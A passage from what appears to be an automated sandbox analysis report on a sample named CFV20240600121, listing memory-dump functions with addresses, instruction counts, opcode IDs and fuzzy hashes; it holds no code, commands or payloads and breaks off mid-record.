                                        • Instruction Fuzzy Hash: 3AA1C170B0061A9FEB25CF69C590BABB7B1FF54314F04402BEA45973A9DB34E852CB50
                                        Function 014A4500 Relevance: .3, Instructions: 275COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5e352290fe3c68bec3c4f073e08a3d36dea9e212246f237f8947c21ba2122784
                                        • Instruction ID: 77ccfe7b204fe14dd855a37729cd406bca6998c403cc813baac146b195e942b5
                                        • Opcode Fuzzy Hash: 5e352290fe3c68bec3c4f073e08a3d36dea9e212246f237f8947c21ba2122784
                                        • Instruction Fuzzy Hash: BDA1D172A00251DFC711DF18C980B6ABBE9FF68744F8A452EE5499B761C3B4ED01CB91
                                        Function 014A2B57 Relevance: .3, Instructions: 266COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                        • Instruction ID: a2ec13993be2cdc30690ea528fe594067b2d68d5aaa62d016176b22a1e4f1efd
                                        • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                        • Instruction Fuzzy Hash: 6AB16A71E0061ADFDF19CFADC880AAEBBB5FF58310F55812AE914A7361D770A941CB90
                                        Function 014560E0 Relevance: .3, Instructions: 264COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7200bfad22306b2a224e8a737178ce91298d811cf18688c56309e7f1e9b36a14
                                        • Instruction ID: 3ebdfb9df431cdc7542e046b3a271f34b599e6219d0300372567aece3537e0d4
                                        • Opcode Fuzzy Hash: 7200bfad22306b2a224e8a737178ce91298d811cf18688c56309e7f1e9b36a14
                                        • Instruction Fuzzy Hash: 3D91B471D00216AFDF55DF68D884BBEBFB5AF48710F56415AFA10AB362D734E9008BA0
                                        Function 013EE3F0 Relevance: .3, Instructions: 261COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 34a91ba0c5e0421edd4a5975f9ec523caef25c16eba533781cf545f5b76f9d7a
                                        • Instruction ID: 2f67e1dc950b7357d21947d93e44d58557888f79f36e3b742d241142b5d45e8e
                                        • Opcode Fuzzy Hash: 34a91ba0c5e0421edd4a5975f9ec523caef25c16eba533781cf545f5b76f9d7a
                                        • Instruction Fuzzy Hash: 75910531A0072ACBEB24DB5DC448B7ABBE5EF98718F15807AE905AB3D0E674D901CB51
                                        Function 01426ACC Relevance: .2, Instructions: 226COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 80f1a86f15d445f27870fe0bfda8515907c2580f012a18730f86d40764288856
                                        • Instruction ID: 81cb32529dc897c0741cde974f113d86b224b759a7ebf71847a1142d2e2d6dd3
                                        • Opcode Fuzzy Hash: 80f1a86f15d445f27870fe0bfda8515907c2580f012a18730f86d40764288856
                                        • Instruction Fuzzy Hash: DB81A2B1E006299BDB18CF69C940ABEBBF9FB48700F45852EE845E7650E334D981CB94
                                        Function 0149AB40 Relevance: .2, Instructions: 222COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                        • Instruction ID: 45032f18fb61e4e639a2ec16eb410651ebdf3be531d91157a1f9cab338ed3905
                                        • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                        • Instruction Fuzzy Hash: 51818171A0025A9FDF19CF59C480AAEBBF2BF94310F24856ED9169B364D774E902CB40
                                        Function 0140E284 Relevance: .2, Instructions: 212COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a9bfe9679647802711c8df2df9a12dd10a8ca701caed906be0da8d4ea7b08f7b
                                        • Instruction ID: 0adb3df7c612523a5bef29a2920c871d72f8501fa1f4844d76835db0dd966f12
                                        • Opcode Fuzzy Hash: a9bfe9679647802711c8df2df9a12dd10a8ca701caed906be0da8d4ea7b08f7b
                                        • Instruction Fuzzy Hash: 9B817171900609AFDB26CFAAC880AEFBBF9FF48354F10442EE555A7260D730AC55DB50
                                        Function 013EC640 Relevance: .2, Instructions: 206COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3f3bec2043d3307e8351ea4a42090131547090d95856d68c2abb70cd970e4fe1
                                        • Instruction ID: 6215ad5e4dddeea7c8d12962a446679f8f036de10350a74e9febc35264405a3b
                                        • Opcode Fuzzy Hash: 3f3bec2043d3307e8351ea4a42090131547090d95856d68c2abb70cd970e4fe1
                                        • Instruction Fuzzy Hash: F371AD7590026A9FCB258F59C5947FEFBF5FF88714F14421AE942AB3A0D3349801CBA0
                                        Function 014847A0 Relevance: .2, Instructions: 202COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 682486df044960f302d5af3399d18e320407d9da9fa7e86bfc537bf54b4ba96c
                                        • Instruction ID: 11fca4877bcf51d6f1e485f9f2a701873abc6fcddaacf340bce177daded4c8a8
                                        • Opcode Fuzzy Hash: 682486df044960f302d5af3399d18e320407d9da9fa7e86bfc537bf54b4ba96c
                                        • Instruction Fuzzy Hash: 32715D70900206EFDB60EF99DA44A9EFBF8EF94700F1A815BE614AB378D7718941CB54
                                        Function 013E260B Relevance: .2, Instructions: 201COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fee7005294a6464b6511cba6e09b63b14cf9a8c5f86059b89ddc19cb5b642d61
                                        • Instruction ID: fadd2502be4f845f7f5c50872f3a29dd54024cf194aea1edd9a39db0af1aa45e
                                        • Opcode Fuzzy Hash: fee7005294a6464b6511cba6e09b63b14cf9a8c5f86059b89ddc19cb5b642d61
                                        • Instruction Fuzzy Hash: 4B71C0716043529FD311DF2CC484B2BB7E9FF88318F0585AAE8958B3A2DB74D945CB91
                                        Function 0145035C Relevance: .2, Instructions: 198COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                        • Instruction ID: 6ca01c0138da4c36a097d0ddebd46dbfa862c3680454e1fde6c6c0e10d826794
                                        • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                        • Instruction Fuzzy Hash: 0D717F75A00619AFDB10DFA9C984EDEBBF8FF58704F10456AE905A72A1DB30EA41CB50
                                        Function 014662A0 Relevance: .2, Instructions: 198COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ba76a2b2af8544b3d09a9b63492e147646894eccb57ab9d2190aa2f71cb4a509
                                        • Instruction ID: 466634ff573257ab579233aa0ea1de42d15c765bf4de1314be4706d02e601c2f
                                        • Opcode Fuzzy Hash: ba76a2b2af8544b3d09a9b63492e147646894eccb57ab9d2190aa2f71cb4a509
                                        • Instruction Fuzzy Hash: 7E710332200701AFEB32DF18C844F56BBEAFF40768F16452AE2168B2B0D774E945CB51
                                        Function 013D8AA0 Relevance: .2, Instructions: 197COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 98cefb3a5a87d991c84da4b6f62ec56753b8bdcb900636ea489714c111091a88
                                        • Instruction ID: 5c86c5c1588cab8e325a1041431abeb6c9d4360128e502b3f94231867db88ab1
                                        • Opcode Fuzzy Hash: 98cefb3a5a87d991c84da4b6f62ec56753b8bdcb900636ea489714c111091a88
                                        • Instruction Fuzzy Hash: 0081B172A043168FDB25CF9CD994B6E77B5BF88314F19416AD9006B3A1C7B4AD41CB90
                                        Function 014A8324 Relevance: .2, Instructions: 192COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f8bbbca4c0aeb07a10d68c7556ca1c3c9ff45cc521f5d514274759f2183f676d
                                        • Instruction ID: 273ee55359190da193c49526de95ae6f31818bf8a6153c74557da7c89a69c923
                                        • Opcode Fuzzy Hash: f8bbbca4c0aeb07a10d68c7556ca1c3c9ff45cc521f5d514274759f2183f676d
                                        • Instruction Fuzzy Hash: 54713D71E0020AAFDF15DF95C841FEEBBB8FF14351F51412AEA10A72A0E774AA05CB90
                                        Function 0148A250 Relevance: .2, Instructions: 184COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1dc764b955889f47df62db86e3d75721083de77ab43b2ac756564f7856af3bf6
                                        • Instruction ID: 9a907bfb5581739dcab20ffe0738c35abaf95bd4b90c58055e901e23c4e06c32
                                        • Opcode Fuzzy Hash: 1dc764b955889f47df62db86e3d75721083de77ab43b2ac756564f7856af3bf6
                                        • Instruction Fuzzy Hash: 4451A172505712AFD712EA68C844A5FB7E8EBC5B54F01053FBA40DB260D7B0DD05C7A2
                                        Function 01478350 Relevance: .2, Instructions: 161COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7f693f17cfe229869c5f72f1ccf6ef5fad677a6f152bf0ff3418c3dc6a70ba04
                                        • Instruction ID: fdcdc5e73588250cb669a3773e2a2789cc56c2a0ef80a52215b6fd0dce0ae896
                                        • Opcode Fuzzy Hash: 7f693f17cfe229869c5f72f1ccf6ef5fad677a6f152bf0ff3418c3dc6a70ba04
                                        • Instruction Fuzzy Hash: 85519E709007069FD721DF6AC888AABFBF8BF64710F10462FD296976B0D7B0A545CB90
                                        Function 0140E443 Relevance: .2, Instructions: 158COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 61c9ae6e83193abb0c7f10fb54566c5da8fd85e8c6fa2fd4b23e5c82f8b3843d
                                        • Instruction ID: 2c67eaabf2f48a2cdb2cd56c8ecb0c4751e043895e5319a96542b50260ae7d19
                                        • Opcode Fuzzy Hash: 61c9ae6e83193abb0c7f10fb54566c5da8fd85e8c6fa2fd4b23e5c82f8b3843d
                                        • Instruction Fuzzy Hash: 46515E71200A15DFDB22EFAAC984E6BB3F9FF58744F41086AE542972B0D734E951CB50
                                        Function 01474180 Relevance: .2, Instructions: 156COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fd9595ecb9439194410975d8d817820d583d71b0eb02f36fffb72ef433eeb2eb
                                        • Instruction ID: 166e713a63f33aecfbc8d8dfcaacf6f661c56866af0a1782a568689f50760a10
                                        • Opcode Fuzzy Hash: fd9595ecb9439194410975d8d817820d583d71b0eb02f36fffb72ef433eeb2eb
                                        • Instruction Fuzzy Hash: DC5158716083428FD754DF69C980AABBBE5BFD8218F48492EF589C7360E730D905CB92
                                        Function 013F45B1 Relevance: .2, Instructions: 156COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                        • Instruction ID: f6a5e30a4296b2d5f85867d7fb113bcae6e47619139c5c3281a7948d67f950ce
                                        • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                        • Instruction Fuzzy Hash: 4E516E75E0021AABDF15DF98C440BEFBBB9AF49758F04406EEA15AB250D734DA44CBA0
                                        Function 0145E9E0 Relevance: .2, Instructions: 154COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                        • Instruction ID: 273f4c7a70f7c0e2410cab2adce5ba23ee3816b73b8d408b47fed844a1adb2b9
                                        • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                        • Instruction Fuzzy Hash: 6251B671D0020AABEF51DE94C880BAFFB75AB00315F11466BDE12B72A2D7709F41C7A0
                                        Function 01498B28 Relevance: .2, Instructions: 152COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 212a6deef2bc1c94d4d061532e141715a7906deffc980cfe27677b11e0f9f241
                                        • Instruction ID: d3e94dc6962658c3ae928f52da3a2e6eb3f75ef4e13344b2e6d912768dbf6397
                                        • Opcode Fuzzy Hash: 212a6deef2bc1c94d4d061532e141715a7906deffc980cfe27677b11e0f9f241
                                        • Instruction Fuzzy Hash: 3741D67170165A9BDF25DB2EC894F7BBF9AEF92220F08811AF915873A1D730D801C691
                                        Function 0145CBF0 Relevance: .1, Instructions: 148COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 56730530718bf97a28537a0d92cd8ce8c18b5f1f1102143f76329c1ffc20becd
                                        • Instruction ID: 9cb68733df5a5daec5b781ac32b40826785269b7fb8ba12265b28c619693f7eb
                                        • Opcode Fuzzy Hash: 56730530718bf97a28537a0d92cd8ce8c18b5f1f1102143f76329c1ffc20becd
                                        • Instruction Fuzzy Hash: 41517E72A00316DFCB61DFA9C5C09AFBBB9FF48358B11851AD945A3312D730A902CB90
                                        Function 0140A430 Relevance: .1, Instructions: 139COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4d0a7ac44c01803347ed173866688d0cf0f13a84ac7c79de5644963feb8378da
                                        • Instruction ID: 11a14e13aee918ac057c91ee5e91717669b8b1512dfbfc2d8135e6bae67feb38
                                        • Opcode Fuzzy Hash: 4d0a7ac44c01803347ed173866688d0cf0f13a84ac7c79de5644963feb8378da
                                        • Instruction Fuzzy Hash: C8411571640302EFDB26EF6AD881B6A7766BB55708F02043FED469B3B1D7B198018791
                                        Function 0149A9D3 Relevance: .1, Instructions: 139COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                        • Instruction ID: 23237a1d91547f3c6112145fb7295828834508d701d34388a5aac9f0ed24d404
                                        • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                        • Instruction Fuzzy Hash: E341E6316017169FDF25CF68C984A6BBBE9FF90214B15462FEA1287750EB34ED05CB90
                                        Function 014001F8 Relevance: .1, Instructions: 138COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9da310f2c2e1d69f03c6af28f48ae388ec267f513646ec8aa2c980068993d1ec
                                        • Instruction ID: a0864f24348200f2bbe0d0be3fc1b45ae45fba6b1a3c83b7996900ec94dd1361
                                        • Opcode Fuzzy Hash: 9da310f2c2e1d69f03c6af28f48ae388ec267f513646ec8aa2c980068993d1ec
                                        • Instruction Fuzzy Hash: 7341B832A002199BDB12DF9AC440BEEBBB4BF58750F14812FF905A73A0D7359C42CBA4
                                        Function 013FEBFC Relevance: .1, Instructions: 138COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 350b3afdfbf0e90e3beafe5e9d65118d55cb1236f98fa53beb11896e2736e9e8
                                        • Instruction ID: b7b7969aa24736617f3ecbe5c95cca41053fcef8c6d45a4c154867520d7b1ce6
                                        • Opcode Fuzzy Hash: 350b3afdfbf0e90e3beafe5e9d65118d55cb1236f98fa53beb11896e2736e9e8
                                        • Instruction Fuzzy Hash: 9D418F716043069FDB21DF28C888A27B7E9BB88218F01483EFA57C7761DB75E8458B51
                                        Function 01412750 Relevance: .1, Instructions: 137COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                        • Instruction ID: bb3ad3df6f5dabe8d0d15a751cbe37ec37d57afc85f463b6048ae983de60330f
                                        • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                        • Instruction Fuzzy Hash: E0515D75A40215CFEB15CF58C480AAEF7B1FF84710F2881AAD916A7361D770AE42CB90
                                        Function 013D6154 Relevance: .1, Instructions: 133COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b485bf0ffa5c01dc0e63faf96fb7ac42207b8ed63973f5c7a3e1bfa4fff44998
                                        • Instruction ID: 2632dbda8a96a27b2be05cbd531d852740e902c5d54ba39497b5cb736a198c9b
                                        • Opcode Fuzzy Hash: b485bf0ffa5c01dc0e63faf96fb7ac42207b8ed63973f5c7a3e1bfa4fff44998
                                        • Instruction Fuzzy Hash: CD5136B190021ADFDB25CB28DC05BA9BBB4FF55318F0482AAE529A77E1D7349981CF40
                                        Function 013D0BCD Relevance: .1, Instructions: 130COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e90081573085e1b2c594a6c07e541634d1bb974dcd0b7ca494bef97e16aff777
                                        • Instruction ID: 6fd79ccb538d0c00ab213a2f8fd988a58588d965ea4570004480274b136fd133
                                        • Opcode Fuzzy Hash: e90081573085e1b2c594a6c07e541634d1bb974dcd0b7ca494bef97e16aff777
                                        • Instruction Fuzzy Hash: 1A41B172A003299BCF25DF6CD940BEA77B8EF44B44F4100AAE908AB251D774DE81CB91
                                        Function 0149866E Relevance: .1, Instructions: 129COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                        • Instruction ID: b338a85e74ac7df693939cf4d020385cfb627ce81b1a8f97887305f245bf2c89
                                        • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                        • Instruction Fuzzy Hash: E341A675B0020BABDF15DF9DCC84AAFBFBAAF99600F14406AE504A7361D670DD11C7A0
                                        Function 013D0887 Relevance: .1, Instructions: 128COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7e989a76ad28c9f37d76bd8ad4f1b67d332609800508ed2a98f57db256971a0d
                                        • Instruction ID: 6eec1061d705845f3eefda3de42a77fffd1c401885df6bae33b9338449a97e71
                                        • Opcode Fuzzy Hash: 7e989a76ad28c9f37d76bd8ad4f1b67d332609800508ed2a98f57db256971a0d
                                        • Instruction Fuzzy Hash: F941D6B26007059FE329CF29E580926BBF9FF45718F144A6EE55B87A60E730F845CB90
                                        Function 013FA470 Relevance: .1, Instructions: 127COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8a6865fb647f13305808ee07e22e4e81074f142305867521b38e204128085c18
                                        • Instruction ID: 88425f37f1ff3bc4b2e9e7e8a280702934375f63f8778f99d95a19955312d2bc
                                        • Opcode Fuzzy Hash: 8a6865fb647f13305808ee07e22e4e81074f142305867521b38e204128085c18
                                        • Instruction Fuzzy Hash: 9C41C231941219CFDF21DF6CC5A87AE7BB4FB58368F18015AD519BB3A5DB349900CB60
                                        Function 013D8BF0 Relevance: .1, Instructions: 124COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013A0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_13a0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7810c8f649064fce25333fb3cd81a1392c2ccf1cda18344cdd399fdd13f8d6b7
                                        • Instruction ID: 028c0aff678ae3843fa35df42d19f5273a513a85811aae3744ff10fad3bea018
